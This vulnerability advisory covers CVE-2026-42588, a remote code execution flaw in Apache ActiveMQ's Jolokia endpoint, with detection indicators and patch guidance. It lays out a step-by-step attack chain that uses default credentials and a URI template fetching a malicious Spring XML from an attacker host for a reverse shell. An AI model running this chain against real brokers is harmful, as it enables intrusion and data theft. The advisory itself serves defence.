CVE-2026-42588: 
Java Analisi e mitigazione delle vulnerabilità

CVE-2026-42588 is a Remote Code Execution vulnerability in Apache ActiveMQ Classic, classified as Improper Input Validation (CWE-20) and Code Injection (CWE-94). It affects Apache ActiveMQ, ActiveMQ Broker, and ActiveMQ All in versions before 5.19.7 and from 6.0.0 before 6.2.6. The vulnerability was disclosed on May 31, 2026 via the oss-security mailing list and published to NVD on June 1, 2026. It carries a CVSS v3.1 base score of 8.1 (High) (GitHub Advisory, Openwall).

The root cause lies in Apache ActiveMQ Classic's exposure of the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console, where the default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String). An authenticated attacker can invoke this operation with a crafted discovery URI using the masterslave:// URL scheme, which triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext. Because Spring instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec() — before any validation can block it (Openwall, GitHub Advisory).

Successful exploitation allows an authenticated attacker to execute arbitrary code on the broker's JVM with the privileges of the ActiveMQ process, resulting in high confidentiality and integrity impact. An attacker can read sensitive data accessible to the broker process, modify broker configuration, deploy malicious payloads, or pivot to other systems reachable from the broker host. Availability is not directly impacted by the vulnerability itself, but post-exploitation actions could disrupt broker operations (GitHub Advisory, Openwall).

1. Reconnaissance: Identify internet-facing Apache ActiveMQ instances (versions before 5.19.7 or 6.0.0–6.2.5) using tools like Shodan or Censys, searching for the ActiveMQ web console (typically on port 8161).
2. Obtain credentials: Acquire valid credentials for the ActiveMQ web console — default credentials (admin/admin) are common in unmodified deployments.
3. Confirm Jolokia exposure: Verify that the Jolokia endpoint is accessible at http://<target>:8161/api/jolokia/ and that exec operations on org.apache.activemq:* MBeans are permitted.
4. Host malicious Spring XML: Set up an attacker-controlled server (VPS) hosting a malicious Spring XML application context file that defines a singleton bean invoking Runtime.exec() with a reverse shell or other payload.
5. Craft the exploit request: Send an authenticated HTTP POST or GET request to the Jolokia endpoint invoking BrokerService.addNetworkConnector with a crafted discovery URI in the form masterslave://...?brokerConfig=xbean:http://<attacker-vps>/malicious.xml.
6. Trigger RCE: Spring's ResourceXmlApplicationContext fetches and instantiates the malicious XML before BrokerService validation, executing the attacker's payload (e.g., reverse shell) on the broker's JVM.
7. Establish persistence: Use the achieved shell to deploy a persistent backdoor, exfiltrate data, or pivot to other internal systems reachable from the broker host (Openwall, GitHub Advisory).

• Network: Unusual HTTP requests to /api/jolokia/ on the ActiveMQ web console port (default 8161), particularly POST requests invoking BrokerService.addNetworkConnector with masterslave:// URIs; outbound HTTP/HTTPS connections from the ActiveMQ server to unknown external IPs (fetching remote XML); unexpected reverse shell connections from the broker host to external IPs.
• Logs: ActiveMQ access logs showing authenticated requests to /api/jolokia/exec/org.apache.activemq:*/addNetworkConnector with encoded or suspicious URI parameters; Java stack traces in ActiveMQ logs related to ResourceXmlApplicationContext or Spring bean instantiation errors; log entries showing connections to attacker-controlled hosts.
• File System: Unexpected files written to the ActiveMQ installation directory or temp directories (e.g., downloaded XML files, web shells, or scripts); new cron jobs or scheduled tasks created under the ActiveMQ service account.
• Process: Unusual child processes spawned by the ActiveMQ Java process (e.g., /bin/bash, cmd.exe, curl, wget, python, nc); unexpected network connections initiated by the Java process.

Apache has released patched versions 5.19.7 and 6.2.6 that fix this issue; upgrading is the primary recommended remediation (Openwall, GitHub Advisory). As interim workarounds: restrict network access to the Jolokia endpoint (/api/jolokia/) using firewall rules or reverse proxy ACLs so it is not accessible from untrusted networks; enforce strong, non-default credentials for the ActiveMQ web console; and customize the Jolokia access policy (jolokia-access.xml) to deny exec operations on BrokerService.addNetworkConnector or restrict allowed MBean operations to the minimum required.

The vulnerability was reported by researchers credited as pyn3rd, uname, and 4ra1n (Openwall). Security news outlet SecurityOnline.info covered the flaw, highlighting the Jolokia exploit angle (Feedly). The CVE appeared in a weekly threat landscape digest and was trending in CVE watch communities on Reddit and Bluesky, reflecting moderate community interest given the availability of a public PoC tool. No major vendor statements beyond the Apache advisory have been identified.